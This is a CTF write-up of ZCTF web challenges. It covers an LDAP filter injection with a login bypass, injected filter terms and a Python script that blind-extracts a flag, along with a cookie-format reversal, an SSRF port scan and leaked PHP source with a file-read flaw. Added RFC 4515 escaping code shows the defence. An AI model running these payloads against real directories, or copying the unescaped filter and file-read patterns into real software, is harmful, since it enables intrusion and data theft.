web150
Probably the easiest one.
Hint: sessionhint=ONYUY2JANZXXIIDGNFXEIILDIFZGKICQ
This is base32 encoded.
Decoding it with http://emn178.github.io/online-tools/base32_decode.html gives: sqLi not finD!cAre P
LDAP injection: logging in as admin/* gets us into the second level.
sessionhint=MNQW4IDZN52SAZTJNZSCA3LZEBSGK43DOJUXA5DJN5XD6===
can you find my description? (A baffling hint; only later did I realise how important it was. The challenge author is something else...)
OR injection; the search filter looks like (|(uid=*search*)
Constructing search=)(a= turns it into (|(uid=(=)(x=) and returns:
0 admin
1 test
2 fl4g_is_here
Per the hint, the second attribute is description.
Next construct search=test)(description=* and brute-force the value one character at a time to get the FLAG:
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
# Author:Virink[Isecer]
import time
import urllib.parse
import urllib.request

url = 'http://120.24.18.206/search.php'
# candidate characters for the description value (flag alphabet)
l = '_0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz{}'
playload = "test)(description="
while True:
    for i in l:
        values = {'search': playload + i}
        data = urllib.parse.urlencode(values).encode()
        req = urllib.request.Request(url, data)
        req.add_header('user-agent', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0')
        req.add_header('cache-control', 'no-cache')
        req.add_header('accept', '*/*')
        req.add_header('Cookie', '你的')  # put your own session cookie here
        req.add_header('connection', 'keep-alive')
        req.add_header('Content-Type', 'application/x-www-form-urlencoded')
        response = urllib.request.urlopen(req)
        resule = response.read().decode('utf-8', 'ignore')
        time.sleep(0.5)
        # the entry is only listed when the description prefix matches
        if resule.find('fl4g_is_here') != -1:
            playload += i
            break
    else:
        break  # no character matched: stop instead of looping forever
    print(playload[18:])  # strip the "test)(description=" prefix
    if len(playload) > 59 or playload.find('}') != -1:
        break
zctf{303A61ACE0204A2D5F352771D6F1BBA2}
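On the fixing side, here is an added example (my own code, not from the original writeup or the challenge) showing how RFC 4515 escaping of the search term neutralises the filter injection above, and a small check of which attributes a filter actually references. It assumes the challenge filter is (|(uid=*search*)) with a closing paren, and that uid is the only attribute the application meant to test.

```python
import re

def escape_filter_value(value):
    """Escape an assertion value per RFC 4515 section 3: each character that
    carries filter syntax becomes a backslash plus two hex digits."""
    out = []
    for ch in value:
        if ch in '\\*()\x00':
            out.append('\\%02x' % ord(ch))
        else:
            out.append(ch)
    return ''.join(out)

def vulnerable_filter(term):
    """Concatenates the user term straight into the filter, as web150 did
    (assumed shape: the writeup's (|(uid=*search*) plus a closing paren)."""
    return '(|(uid=*%s*))' % term

def safe_filter(term):
    """Same filter, but the term is escaped before insertion, so ")", "("
    and "*" from the user can no longer change the filter structure."""
    return '(|(uid=*%s*))' % escape_filter_value(term)

# an attribute name is a "(" followed by a descriptor and a filter operator
_ATTR = re.compile(r'\(([A-Za-z][A-Za-z0-9;-]*)\s*(?:=|~=|>=|<=)')

def referenced_attributes(ldap_filter):
    """Attributes the filter actually tests. Comparing this set with the
    intended allow-list ({'uid'} here) flags an injected (description=...)."""
    return set(_ATTR.findall(ldap_filter))

if __name__ == '__main__':
    # constructed inputs: the writeup's login bypass, enumeration and
    # blind-extraction terms
    for term in ('*', ')(a=', 'test)(description=*'):
        for build in (vulnerable_filter, safe_filter):
            f = build(term)
            print('%-45s attributes=%s' % (f, sorted(referenced_attributes(f))))
```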
web100
Running a weak-password list turns up two accounts:
niubenben/123456789
zhangwei/123456
The login is obviously validated through the Cookie.
So I tried all sorts of encodings and hashes.
In the end the cookie format turned out to be md5(index + UTF-7(index)):
md5(1+UTF-7(1))=cd53009e0df5b83529120a75f6f28bf6
zctf{x3y7h_b00s}
web400
The hint points at a WooYun vulnerability: SSRF.
Used Burp to scan ports 1-65535... the port turned out to be 47001.
But I left the scan running on the side and forgot about it... only noticed after the contest had ended... ORZ
web500
Hint: read.php~ (the backup file leaks the source)
<?php
$file=isset($_GET['file'])?$_GET['file']:'';
if(empty($file)){
    exit('The file parameter is empty,Please input it');
}
if( preg_match('/.php/',$_SERVER['QUERY_STRING']) && is_file($file) ){
    die("The parameter is not allow contain .php,Please input safe data");
}
if( preg_match('/admin_index|\.\/|admin_xx_modify/i',$file) ){
    die('Error String!');
}
$realfile = 'aaaaaa/../'.$file;
$file1=fopen($realfile,"r");
header("Content-Type: application/octet-stream");
header("Accept-Ranges: bytes");
header("Accept-Length: ".filesize($realfile));
header("Content-Disposition: attachment; filename=$file");
echo fread($file1,filesize($realfile));
fclose($file1);
?>
Requesting /read.php?file=/xxx.php let me download all sorts of source files...
But before I had a chance to read them, time was up...
Finally
As an amateur web guy my imagination just isn't big enough; I barely managed two problems. I think the result is fine though; after all, I'm no master and no CTF veteran.
I basically spectated these two days of ZCTF, and can only quietly wait for the writeups.